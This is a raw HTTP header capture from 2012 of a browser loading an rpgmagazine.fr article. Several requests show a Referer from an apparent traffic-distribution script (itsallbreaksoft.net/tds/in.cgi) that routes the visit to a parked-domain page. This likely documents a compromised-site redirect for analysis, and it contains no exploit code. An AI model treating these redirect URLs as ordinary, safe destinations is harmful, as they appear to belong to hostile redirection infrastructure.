Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:54 GMT
Etag: &quot;1838301-10e-461f3a8378280&quot;
Accept-Ranges: bytes
Content-Length: 270
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/bullet.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 00:53:11 GMT
Etag: &quot;18382f6-9f-461f918670bc0&quot;
Accept-Ranges: bytes
Content-Length: 159
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/sidebar-bg.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:24:01 GMT
Etag: &quot;1838314-6e-461f3a8a25240&quot;
Accept-Ranges: bytes
Content-Length: 110
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/h3-bg.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 18:23:56 GMT
Etag: &quot;1838307-605-461f3a8560700&quot;
Accept-Ranges: bytes
Content-Length: 1541
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
GET /site/wp-content/themes/eGamer/images/footer.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/wp-content/themes/eGamer/style.css
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 02:58:10 GMT
Etag: &quot;1838306-1baa-461fad760b480&quot;
Accept-Ranges: bytes
Content-Length: 7082
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /images/template/360x318/ist2_746781_female_student.jpg HTTP/1.1

Host: i.nuseek.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
HTTP/1.1 200 OK

Content-Type: image
Content-Length: 20765
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=75644
Date: Tue, 06 Nov 2012 11:50:36 GMT
Connection: keep-alive
GET /site/wp-content/themes/eGamer/images/logo.gif HTTP/1.1

Host: www.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 01:59:51 GMT
Etag: &quot;1838368-8e38-461fa06d233c0&quot;
Accept-Ranges: bytes
Content-Length: 36408
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
GET /css/style.css?rte=1&tm=2&dn=itsallbreaksoft.net&tid=1016&def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8 HTTP/1.1

Host: itsallbreaksoft.net
GET /css/style.css?rte=1&amp;tm=2&amp;dn=itsallbreaksoft.net&amp;tid=1016&amp;def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
Cookie: SessionID=a93fc49b-9ccf-4aca-bd91-bbcaa7de4e08; VisitorID=ff005920-a7fc-4f99-a824-5d985bf27bf3&amp;Exp=11/6/2015 3:50:36 AM
HTTP/1.1 200 OK

Content-Type: text/css; charset=utf-8
Cache-Control: private
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Nov 2012 11:50:37 GMT
Content-Length: 3628
GET /sd?s=124463&f=1 HTTP/1.1

Host: as.casalemedia.com
GET /sd?s=124463&amp;f=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=iso-8859-1
Server: Apache
p3p: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Location: http://as.casalemedia.com/sd?s=124463&amp;f=1&amp;C=1
Content-Length: 237
Expires: Tue, 06 Nov 2012 11:50:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Nov 2012 11:50:36 GMT
Connection: keep-alive
Set-Cookie: CMID=Nc4a80PS1I0AADfwQ8MAAAAt;domain=casalemedia.com;path=/;expires=Wed, 06 Nov 2013 11:50:36 GMT CMPS=134;domain=casalemedia.com;path=/;expires=Mon, 04 Feb 2013 11:50:36 GMT CMPP=008;domain=casalemedia.com;path=/;expires=Mon, 04 Feb 2013 11:50:36 GMT
GET /images/ads/forum_ads2.jpg HTTP/1.1

Host: files.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 17:55:45 GMT
Etag: &quot;183c012-2998-462076162ca40&quot;
Accept-Ranges: bytes
Content-Length: 10648
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/ads/labludique_ads2.jpg HTTP/1.1

Host: files.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 17:43:33 GMT
Etag: &quot;183c011-32aa-4620735c15b40&quot;
Accept-Ranges: bytes
Content-Length: 12970
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/ads/khay_ads2.jpg HTTP/1.1

Host: files.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Mon, 02 Feb 2009 23:26:52 GMT
Etag: &quot;183c00c-2215-461f7e3b5c700&quot;
Accept-Ranges: bytes
Content-Length: 8725
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/ads/jerom_ads2.jpg HTTP/1.1

Host: files.rpgmagazine.fr

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.rpgmagazine.fr/site/?p=156
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Tue, 06 Nov 2012 11:50:36 GMT
Server: Apache/2.2.13 (Unix) PHP/5.2.11
Last-Modified: Tue, 03 Feb 2009 15:33:15 GMT
Etag: &quot;183c010-1bb2-4620563c424c0&quot;
Accept-Ranges: bytes
Content-Length: 7090
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET /images/misc/blank.gif HTTP/1.1

Host: i.nuseek.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
HTTP/1.1 200 OK

Content-Type: image
Content-Length: 43
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=51349
Date: Tue, 06 Nov 2012 11:50:37 GMT
Connection: keep-alive
GET /images/Themes/T101/bullets/0006.gif HTTP/1.1

Host: i.nuseek.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/css/style.css?rte=1&amp;tm=2&amp;dn=itsallbreaksoft.net&amp;tid=1016&amp;def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8
HTTP/1.1 200 OK

Content-Type: image
Content-Length: 376
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=85635
Date: Tue, 06 Nov 2012 11:50:37 GMT
Connection: keep-alive
GET /images/Themes/T101/buttons/0006.gif HTTP/1.1

Host: i.nuseek.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/css/style.css?rte=1&amp;tm=2&amp;dn=itsallbreaksoft.net&amp;tid=1016&amp;def=Akamai%3aHostingURL%3dhttp%3a%2f%2fi.nuseek.com%7cParking%3aSkinPath%3divyleague%7cBdyStyl%3aPageBackgroundColor%3d%23fff%7cBdyStyl%3aFont%3darial%7cBdyStyl%3aFontSize%3d12%7cBdyStyl%3aFontColor%3d%230e5fd8%7cBdyStyl%3aPrimaryColor%3d%231b5709%7cBdyStyl%3aPrimaryColorComplement%3d%23fff%7cBdyStyl%3aSecondaryColor%3d%23c44242%7cBdyStyl%3aSecondaryColorComplement%3d%23edc6c6%7cBdyStyl%3aTertiaryColor%3d%23f3f3f3%7cBdyStyl%3aTertiaryColorComplement%3d%23476ec7%7cPgHdr%3aFontSize%3d18%7cPgHdr%3aFont%3dVerdana%7cRelLink%3aFont%3darial%7cRelLink%3aFontSize%3d14%7cRelLink%3aFontColor%3d%23476ec7%7cRelLink%3aHoverFontColor%3d%23c03625%7cRelLink%3aBackgroundColor%3d%23fafad9%7cRelLink%3aDividerColor%3d%23e2dfb8%7cRelLink%3aHoverBackgroundColor%3d%23fbfbf5%7cRelLink%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cRelLink%3aImageWidth%3d10%7cRelLink%3aImageHeight%3d10%7cBottomNav%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets_9x9%2f0006.gif%7cResult%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbullets%2f0006.gif%7cResult%3aHeaderFont%3darial%7cResult%3aHeaderFontSize%3d12%7cResult%3aHeaderFontColor%3d%23000%7cResult%3aTitleFont%3darial%7cResult%3aTitleFontSize%3d16%7cResult%3aTitleFontColor%3d%2300c%7cResult%3aAbstractFont%3darial%7cResult%3aAbstractFontSize%3d12%7cResult%3aAbstractFontColor%3d%23000%7cResult%3aURLFont%3darial%7cResult%3aURLFontSize%3d12%7cResult%3aURLFontColor%3d%23008000%7cResult%3aSidebarBorderColor%3d%23ccc%7cSrchBox%3aImagePath%3d%2fimages%2fThemes%2fT101%2fbuttons%2f0006.gif%7cSrchBox%3aImageWidth%3d60%7cSrchBox%3aImageHeight%3d22%7cSrchBox%3aAlign%3dright%7cSearchLinkGroup%3aHoverLinkColor%3d%23ff9%7cUsrCust%3aFontType%3dverdana%7cUsrCust%3aFontSize%3d11%7cUsrCust%3aFontColor%3d%23666%7cUsrCust%3aLinkColor%3d%230e5fd8
HTTP/1.1 200 OK

Content-Type: image
Content-Length: 894
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Cache-Control: private, max-age=85635
Date: Tue, 06 Nov 2012 11:50:37 GMT
Connection: keep-alive
GET /sd?s=124463&f=1&C=1 HTTP/1.1

Host: as.casalemedia.com
GET /sd?s=124463&amp;f=1&amp;C=1 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
Cookie: CMID=Nc4a80PS1I0AADfwQ8MAAAAt; CMPS=134; CMPP=008
HTTP/1.1 200 OK

Content-Type: text/plain
Server: Apache
p3p: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Content-Length: 0
Expires: Tue, 06 Nov 2012 11:50:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 06 Nov 2012 11:50:37 GMT
Connection: keep-alive
Set-Cookie: CMID=Nc4a80PS1I0AADfwQ8MAAAAt;domain=casalemedia.com;path=/;expires=Wed, 06 Nov 2013 11:50:37 GMT CMPS=134;domain=casalemedia.com;path=/;expires=Mon, 04 Feb 2013 11:50:37 GMT CMPP=008;domain=casalemedia.com;path=/;expires=Mon, 04 Feb 2013 11:50:37 GMT CMST=UJj5jVCY+Y0B;domain=casalemedia.com;path=/;expires=Wed, 07 Nov 2012 11:50:37 GMT CMSC=UJj5jQ**;domain=casalemedia.com;path=/; CMDD=AAHmKAE*;domain=casalemedia.com;path=/;expires=Wed, 07 Nov 2012 11:50:37 GMT
GET /ga.js HTTP/1.1

Host: www.google-analytics.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT
HTTP/1.1 200 OK

Content-Type: text/javascript
Content-Length: 14888
Content-Encoding: gzip
Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT
X-Content-Type-Options: nosniff, nosniff
Date: Tue, 06 Nov 2012 01:11:30 GMT
Expires: Tue, 06 Nov 2012 13:11:30 GMT
Vary: Accept-Encoding
Age: 38347
Cache-Control: max-age=43200, public
Server: GFE/2.0
GET /04846fc6-92f0-4268-8fb5-57b8db59a208.ippi?g=04846fc6-92f0-4268-8fb5-57b8db59a208 HTTP/1.1

Host: itsallbreaksoft.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://itsallbreaksoft.net/tds/in.cgi?3&amp;seoref=&amp;parameter=$keyword&amp;se=$se&amp;ur=1&amp;HTTP_REFERER=http%3A%2F%2Fwww.rpgmagazine.fr%2Fsite%2F%3Fp%3D156&amp;default_keyword=notdefine
Cookie: SessionID=a93fc49b-9ccf-4aca-bd91-bbcaa7de4e08; VisitorID=ff005920-a7fc-4f99-a824-5d985bf27bf3&amp;Exp=11/6/2015 3:50:36 AM
HTTP/1.1 200 OK

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Nov 2012 11:50:38 GMT
